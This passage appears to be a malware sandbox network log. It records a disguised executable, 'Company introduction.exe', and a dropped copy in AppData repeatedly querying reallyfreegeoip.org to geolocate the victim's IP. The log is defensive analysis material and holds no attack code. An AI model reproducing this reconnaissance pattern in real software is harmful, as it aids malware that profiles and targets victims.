                                                                                                                                                  2025-01-15 07:39:04 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  1192.168.2.449735104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:05 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:05 UTC863INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:05 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241534
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C9Zq5WAUcOI%2ByY8icedV7kq5PZxQ%2Fned%2BRnYzM%2FWAvYjKzT90TlZrHJpJMVxGiH7lQuviZYg0hOZXWkgYH%2F6rJM9WmhIEmXWFVI3o2LK92FMULrKQu%2FUqB0o3smbIcdvr%2BxrRLaB"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435c0b8a08cda-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1980&min_rtt=1970&rtt_var=746&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1482233&cwnd=244&unsent_bytes=0&cid=4050d038fbe5a07a&ts=151&x=0"
                                                                                                                                                  2025-01-15 07:39:05 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  2192.168.2.449740104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:07 UTC863INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:06 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241536
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y21QOajg0FcpP99it8HEyVg%2FAZStQqiOQPX0kjy2mHjut%2FSiCvN3nMSFSLYos6LKoNmo2XhKrbnJJClf%2BmdrSZG8rRkVkldGgBH1eEBb1eXGKdJrO0%2FeYfpxMKPa%2FCMY%2BK4OfpN%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435c87d7e8c15-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1789&min_rtt=1781&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1578378&cwnd=238&unsent_bytes=0&cid=1ed16997623605a5&ts=160&x=0"
                                                                                                                                                  2025-01-15 07:39:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  3192.168.2.449741104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:07 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:07 UTC857INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241536
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a8ywdwWj8HbLX9kjYU7LishMVgoGcvnuwIp1VI2%2F1YKM7Oab%2FmdDTS9QDFLh9aZ2X9H2j31tf8s1pWVKlaxmUpXsXh02qnvHNzkcJ1sn4BLuPbIlDW%2Fz2JFOGLWP78j5SRjtQ%2B5C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435c9ce748c15-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1745&rtt_var=693&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1536842&cwnd=238&unsent_bytes=0&cid=56fa3e95404daa51&ts=215&x=0"
                                                                                                                                                  2025-01-15 07:39:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  4192.168.2.449743104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:07 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:08 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:07 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241537
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0AEiYOJU7YGkTL6mbqoSVGoTKNiMxfQfJmQbJfNkzmnfzdgO9fiEeHbzLxfuhCkqwVPmXirMKg397%2B%2BkuRHYmFGaOHGqQcwgpfOn3WWQ5JEEYAXiCUg%2BMpH0AllN3GfcbYeYy2fe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435cebff142e9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1716&min_rtt=1708&rtt_var=656&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1647855&cwnd=241&unsent_bytes=0&cid=50af56b471b53a40&ts=121&x=0"
                                                                                                                                                  2025-01-15 07:39:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  5192.168.2.449744104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:08 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:08 UTC867INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:08 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241537
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQUfrV6aboADzhzJiAY%2Bvhxba4DYyRJ7EAjllEhtKQBIGnDu0%2BvCm1TQCcsStp5Af%2FhNx%2BpYBp2VXlNLcjtvxkI%2F%2FgaO%2FSZ6zf7QMNyg0Mdh38Qal1WN%2BhYf3UGZC59ALoOPORY8"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435d0696cc461-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1506&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1938911&cwnd=232&unsent_bytes=0&cid=8eca5204ff795cf2&ts=159&x=0"
                                                                                                                                                  2025-01-15 07:39:08 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.449747104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:09 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:09 UTC857INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:09 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241538
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7I0v8wwpZbIoKTATJuvnc8TE%2FQ25lXJsrIflUOMbbTy8331aN4cey2mhKUB46XxmdnFXeJcXUXaPtL0yFJ4N4tl0YyBaTPdM58tD%2FXJjDGjtHJPrgUzGuvwSqGAvro2%2FuND3Dev%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435d68bd58cda-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1951&rtt_var=776&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1372180&cwnd=244&unsent_bytes=0&cid=baf7fa6091c58ddf&ts=150&x=0"
                                                                                                                                                  2025-01-15 07:39:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  7192.168.2.449748104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:09 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:09 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241538
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sofZmrp5YmslKwEbJVitpzP3imAjeHMkbXinWjfkQyvQMb6t8zVtlsUszBYt3aVl%2BBx8QaqbYZANMmQB71%2Fk%2BrBx8BOCb54505bWokPt5iyGT8CQ0ZXXYI7DvKRAQMum0hxtnvXk"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435d82d6ec461-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1459&min_rtt=1446&rtt_var=569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1880231&cwnd=232&unsent_bytes=0&cid=e28b46c42903fa6d&ts=137&x=0"
                                                                                                                                                  2025-01-15 07:39:09 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  8192.168.2.449751104.21.48.14438144C:\Users\user\AppData\Roaming\FzXKnGk.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:10 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  2025-01-15 07:39:10 UTC855INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:10 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241539
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AkOxWWJm7KSizQSjVqJXLbiPD7Kj%2FBVLGwX6To3OIVvS5vC5gWbcyfHwNdK2aREFmV5om2ANg%2FuYx7hj2Pa7P2bnax4GlwdO5nsGuHXC9fbm3V5Y5yRRbaXFsg6VctmK3%2F070dtJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 902435de5f6442e9-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1593&rtt_var=611&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1769696&cwnd=241&unsent_bytes=0&cid=279ee828e6cf956f&ts=141&x=0"
                                                                                                                                                  2025-01-15 07:39:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  9192.168.2.449752104.21.48.14437812C:\Users\user\Desktop\Company introduction.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2025-01-15 07:39:10 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2025-01-15 07:39:10 UTC853INHTTP/1.1 200 OK
                                                                                                                                                  Date: Wed, 15 Jan 2025 07:39:10 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 362
                                                                                                                                                  Connection: close
                                                                                                                                                  Age: 2241539
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
